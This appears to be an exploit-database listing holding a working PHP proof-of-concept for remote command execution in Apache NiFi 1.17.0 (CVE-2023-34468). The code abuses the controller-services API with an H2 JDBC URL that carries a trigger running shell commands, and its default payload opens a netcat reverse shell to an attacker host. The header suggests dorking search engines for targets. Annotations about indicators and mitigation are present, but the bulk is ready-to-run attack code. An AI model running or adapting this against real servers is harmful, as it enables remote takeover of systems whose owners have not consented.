## https://sploitus.com/exploit?id=PACKETSTORM:189686
=============================================================================================================================================
| # Title : Apache NiFi 1.17.0 RCE Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://nifi.apache.org/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] Code Description: exploits the remote command execution vulnerability in Apache NiFi
(Related : https://packetstorm.news/files/id/174398/ Related CVE numbers: CVE-2023-34468 ) .
[+] save code as poc.php.
[+] Set target : line 61 + 62
[+] Payload :
<?php
// Script that exploits the remote command execution vulnerability in Apache NiFi
/**
 * Proof-of-concept client for the NiFi issue referenced in the page header
 * (CVE-2023-34468). It asks the NiFi REST API to create a database controller
 * service whose H2 JDBC URL embeds a CREATE TRIGGER statement.
 *
 * Defender notes: the only network activity is a single JSON POST to
 * nifi-api/controller-services (see exploit()). The indicator to look for in
 * request logs and in existing controller-service definitions is a
 * "Database Connection URL" property that carries SQL after the ";" separator
 * together with the org.h2.Driver class name. Mitigation is upgrading to a
 * fixed NiFi release and restricting who may create controller services.
 */
class ApacheNiFiExploit {
// Base URL of the NiFi instance; trailing "/" characters are removed in the constructor.
private $target;
// Optional bearer token; null means no Authorization header is sent.
private $token;
/**
 * @param string      $target base URL of the NiFi instance
 * @param string|null $token  bearer token, or null for unauthenticated requests
 */
public function __construct($target, $token = null) {
$this->target = rtrim($target, '/');
$this->token = $token;
}
/**
 * Issues one HTTP request to the NiFi API and decodes the JSON reply.
 *
 * No TLS options are set, so curl's default certificate verification applies.
 *
 * @param string     $endpoint path relative to the target base URL
 * @param string     $method   HTTP verb passed to CURLOPT_CUSTOMREQUEST
 * @param array|null $data     JSON-encoded as the request body when truthy
 * @return mixed decoded JSON, or null when the transfer failed or the body was not JSON
 */
private function sendRequest($endpoint, $method = 'GET', $data = null) {
$url = "$this->target/$endpoint";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
if ($this->token) {
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Authorization: Bearer $this->token"]);
}
if ($data) {
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
// Setting CURLOPT_HTTPHEADER again replaces the list set above, which is why
// the Authorization header is merged back in next to the Content-Type.
curl_setopt($ch, CURLOPT_HTTPHEADER, array_merge([
'Content-Type: application/json'
], $this->token ? ["Authorization: Bearer $this->token"] : []));
}
// curl_exec() returns false on a transport failure; json_decode() then yields
// null, so "no reply" and "reply that was not JSON" are indistinguishable here.
$response = curl_exec($ch);
curl_close($ch);
return json_decode($response, true);
}
/**
 * Creates a controller service whose JDBC URL carries the trigger definition.
 *
 * The printed success/failure message depends only on whether the API returned
 * a component id, i.e. whether the controller service was created; nothing here
 * verifies that the trigger actually ran.
 *
 * @param string $payload command string that is base64-encoded into the trigger body
 */
public function exploit($payload) {
// The trigger body carries the base64 form of the command and decodes it again.
$b64_payload = base64_encode($payload);
// Random database file name and trigger name (8 hex characters each), so every
// run produces a distinct service definition.
$db_name = bin2hex(random_bytes(4));
$trigger_name = strtoupper(bin2hex(random_bytes(4)));
// Controller-service definition as sent to the API. The "Database Connection URL"
// is an H2 file URL followed by a ";"-separated CREATE TRIGGER statement whose body
// is JavaScript calling java.lang.Runtime.exec(). For auditing, any H2 URL that
// contains SQL statements is the thing to flag.
$db_config = [
'component' => [
'name' => 'ExploitDBPool',
'properties' => [
'Database Connection URL' => "jdbc:h2:file:/tmp/$db_name.db;CREATE TRIGGER $trigger_name BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {echo,$b64_payload}|{base64,-d}|{bash,-i}')\n$$--=x",
'Database Driver Class Name' => 'org.h2.Driver'
]
]
];
// Single POST to the controller-services endpoint.
$response = $this->sendRequest('nifi-api/controller-services', 'POST', $db_config);
// Only checks that a component id came back (service created).
if (isset($response['component']['id'])) {
// Message (Arabic): "Database connection service created and exploited successfully!"
echo "[+] تم إنشاء واستغلال خدمة الاتصال بقاعدة البيانات بنجاح!";
} else {
// Message (Arabic): "Failed to carry out the attack."
echo "[-] فشل في تنفيذ الهجوم.";
}
}
}
// Placeholder base URL and bearer token; the PoC text above says these two
// lines are the ones to edit.
$target = 'https://target-nifi-instance.com';
$token = 'YOUR_BEARER_TOKEN'; // if authentication is required
// Builds the client and sends the single controller-service creation request;
// the argument is the command string that exploit() embeds in the trigger body.
$exploit = new ApacheNiFiExploit($target, $token);
$exploit->exploit('nc -e /bin/bash attacker-ip 4444');
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================